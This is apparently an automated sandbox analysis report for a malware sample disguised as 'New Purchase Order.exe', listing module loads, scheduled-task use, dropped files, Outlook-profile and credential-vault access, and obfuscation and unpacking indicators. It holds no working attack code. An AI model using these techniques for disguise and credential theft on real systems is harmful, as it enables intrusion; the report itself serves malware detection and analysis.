            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wdscore.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: New Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kdFPsEWDpy.exe, 00000010.00000002.4110547247.000000000095E000.00000002.00000001.01000000.0000000D.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4110594599.000000000095E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: New Purchase Order.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: ibDqDkseW.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.cs.Net Code: SLGn55YnVj System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.cs.Net Code: SLGn55YnVj System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.cs.Net Code: SLGn55YnVj System.Reflection.Assembly.Load(byte[])
            Source: 17.2.setupugc.exe.3eecd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 20.0.kdFPsEWDpy.exe.2d4cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 20.2.kdFPsEWDpy.exe.2d4cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0041A857 push DD2CA9E8h; retf 8_2_0041A85D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040D20D push esp; ret 8_2_0040D258
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004032C0 push eax; ret 8_2_004032C2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040ABA3 push esi; ret 8_2_0040ABA4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00408433 push eax; iretd 8_2_00408434
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00417D95 push ds; ret 8_2_00417D97
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00418EE1 pushfd ; ret 8_2_00418F06
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0041A68C push 00000063h; retf 8_2_0041A68E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0110225F pushad ; ret 8_2_011027F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011027FA pushad ; ret 8_2_011027F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011309AD push ecx; mov dword ptr [esp], ecx8_2_011309B6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0110283D push eax; iretd 8_2_01102858
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0110135E push eax; iretd 8_2_01101369
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014DC54D pushfd ; ret 14_2_014DC54E
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014DC54F push 8B014667h; ret 14_2_014DC554
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014DC9D7 push edi; ret 14_2_014DC9D9
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014909AD push ecx; mov dword ptr [esp], ecx14_2_014909B6
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0146135E push eax; iretd 14_2_01461369
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01461FEC push eax; iretd 14_2_01461FED
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014E7E99 push ecx; ret 14_2_014E7EAC
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0042DA0C push esi; retf 14_2_0042DA2F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038C225F pushad ; ret 17_2_038C27F9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038C27FA pushad ; ret 17_2_038C27F9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038F09AD push ecx; mov dword ptr [esp], ecx17_2_038F09B6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038C283D push eax; iretd 17_2_038C2858
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038C1368 push eax; iretd 17_2_038C1369
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E703F2 push ss; iretd 17_2_02E703F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E703BE push ebp; iretd 17_2_02E703CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E6C36D push edx; iretd 17_2_02E6C36E
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E624EA push ebx; retf 17_2_02E624EB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E70400 push ds; retf 17_2_02E70403
            Source: New Purchase Order.exeStatic PE information: section name: .text entropy: 7.890776799320837
            Source: ibDqDkseW.exe.0.drStatic PE information: section name: .text entropy: 7.890776799320837
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, jF2en7aHZWyRBJ0Q8c.csHigh entropy of concatenated method names: 'b73NVtL3tX', 'mo0NjyAv2K', 'AfKNLQ8mpR', 'vIcNKTJjGq', 'XYgNRrPkk8', 'tANNPPFy03', 'D5INUQax0d', 'pKlNJ7EBf2', 'a5mNti2N75', 'lrlNywabal'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pZ8VsZpbIyXWRi4xmL.csHigh entropy of concatenated method names: 'He9Lg9bYPa', 'm4ZL485f5n', 'IsYLQLoame', 'K74Lp7hIfs', 'cPhLfTBhhh', 'ONKLrMjGPE', 'rakL6TSBKq', 'wpeLNGduWv', 'mjmL7UhW3l', 'qPrLOdW5Cf'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, AmpewrzqopynfUd9IQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jVd7WiWO7U', 'tuY7fCut2Z', 'uIx7rJ2gS0', 'LBb76VrIRQ', 'ESI7NmM5Cv', 'KLF77My1SR', 'QHt7OLNVjP'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, yjihqph90VT05xOHal.csHigh entropy of concatenated method names: 'erjRGcWlvm', 'cjdRjXBCPp', 'E5URK8qXfe', 'pMxRPtDeO5', 'g2wRUtkgJc', 'W9EKCKdXt7', 'wAvKHIP7sU', 'mw9KqdUjNN', 'mpQKaNCOrj', 'iThKF5pyTs'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, HZy5SBkh2W02yWXDLN.csHigh entropy of concatenated method names: 'j8aWQyWCMB', 'dENWpXGZ9S', 'dcpWhnNMVf', 'w7UWAyZn1b', 'zI8WuRDZ98', 'Kj3W3I0XWr', 'NjnWSaX2a8', 'oVXWbHkqcH', 'Tg5W12lBsX', 'u0pW8mEYXY'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, FIWHVHS5suerTBVvIO.csHigh entropy of concatenated method names: 'FZnPVII5V8', 'ep0PLpYuvU', 'xV5PRZXDk4', 'J1YRXgvArg', 'cMGRzDXvor', 'JeTPiKZUVY', 'xe8PdpIJZS', 'tDMPwnpX4w', 'JVjP2bKIwP', 'kJJPn9Mr3S'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, epK78uX9OTwa4D0L5y.csHigh entropy of concatenated method names: 'cHK7d26un8', 'Rod72TeVOm', 'OUA7nS2MRf', 'JBk7VJpTtp', 'Md27jHVtu9', 'uDE7KlLWFh', 'tqk7RDevs2', 'PXaNqF1xKg', 'q2nNa0pB2u', 'ssJNFeNfcb'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, XY923XnGuNCejkYu1L.csHigh entropy of concatenated method names: 'jlIdPRGX8w', 'oIDdU9wFOo', 'QbIdtyXWRi', 'BxmdyLkcOh', 'EpOdfdgBji', 'Gqpdr90VT0', 'CjKpF6NacvkSPUdcJD', 'YlwsPfCw2QpANjbu6Y', 'VqFddKqI7a', 'GtMd2g88vF'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, ExRvkTwyDRY3WDaugW.csHigh entropy of concatenated method names: 'xq75SoF65', 'MBpg5fnMH', 'WvJ4S61wx', 'X0uTeSNM3', 'S2Xpk1nbX', 'rRhYCdNE6', 'uybUUEAmlW01ueGk5w', 'Bm0PwbZLyFuyeF6JkJ', 'q1rNHPG1v', 'QO4OHUyKi'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, boMgoaHflWSYD8hTXl.csHigh entropy of concatenated method names: 'Ula6a9WT6R', 'Y1G6XKv1Su', 'cQyNiraIQo', 'BwtNdvXovc', 'NhX68ytdb3', 'wLq6lwmQkM', 'bIH6kRRv0e', 'Vr56ZPWSFh', 'bLS69gP3cj', 'YJx6myARiJ'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, zIShGKFVU7XNWg2Mgi.csHigh entropy of concatenated method names: 'xQGNhrBfPJ', 'scINAcq2ZT', 't4mN02s7GY', 'uLnNu8rW1C', 'uBVNZs3aVb', 'GxbN33i05B', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, wRGX8wQWID9wFOoes1.csHigh entropy of concatenated method names: 'sukjZQQ0Mk', 'Yjuj9EgEqu', 'W6vjmknPmy', 'EIYjDv4ABC', 'YBgjCQ1Hp7', 'remjH0pyrX', 'DGljqcNLKW', 'uHNja0Wbx5', 'NUujFHkjjS', 'E6NjXNQ6W7'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, SaOS2Yx9nqj2m77EVd.csHigh entropy of concatenated method names: 'wI0PekqJ4x', 'UuvPBeQgBr', 'O0RP5cFRd1', 'RolPgdlDVF', 'EbBPsHSyhp', 'zTmP4HAq7d', 'fKQPTFg3vZ', 'pLXPQuZR77', 'y9HPpb3b83', 'zj4PYFsCeg'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.csHigh entropy of concatenated method names: 'V932Gkqpgh', 'aBl2VLocvS', 'bfg2jfu3J7', 'USq2Lv6wXT', 'VtV2KWy5gF', 'RpS2RGK6qa', 'V7U2Peyj1H', 'tsd2UTeRp5', 'N4K2JossHA', 'Y5w2t1ZsbP'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, d6lgf2jMUmLwVZlh7E.csHigh entropy of concatenated method names: 'Dispose', 'P2idFWPtm6', 'WcpwAab5t1', 'EK5ee3ahRY', 'PPFdX2en7H', 'RWydzRBJ0Q', 'ProcessDialogKey', 'Oc5wiIShGK', 'fU7wdXNWg2', 'wgiwwnpK78'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, Gn1myqd2XhOdEBacnrW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D5yOZFlQdy', 'i7TO9kXKgs', 'u7IOmLZQRu', 'rtpODclqgj', 'eswOCEN6XA', 'm8MOHWUc53', 'EL0OqK09IQ'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, VBLyFcdi5PPNAqTca6G.csHigh entropy of concatenated method names: 'aK57eACnOx', 'aUa7BoZBeH', 'U8A75JmFVm', 'a8o7gIfr6V', 'mO27s4wbTZ', 'QXU74VFrO1', 'Fge7TSKk8y', 'YbZ7QMHTQC', 'rMI7psu1b1', 'cvC7YPpwOM'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, jF2en7aHZWyRBJ0Q8c.csHigh entropy of concatenated method names: 'b73NVtL3tX', 'mo0NjyAv2K', 'AfKNLQ8mpR', 'vIcNKTJjGq', 'XYgNRrPkk8', 'tANNPPFy03', 'D5INUQax0d', 'pKlNJ7EBf2', 'a5mNti2N75', 'lrlNywabal'
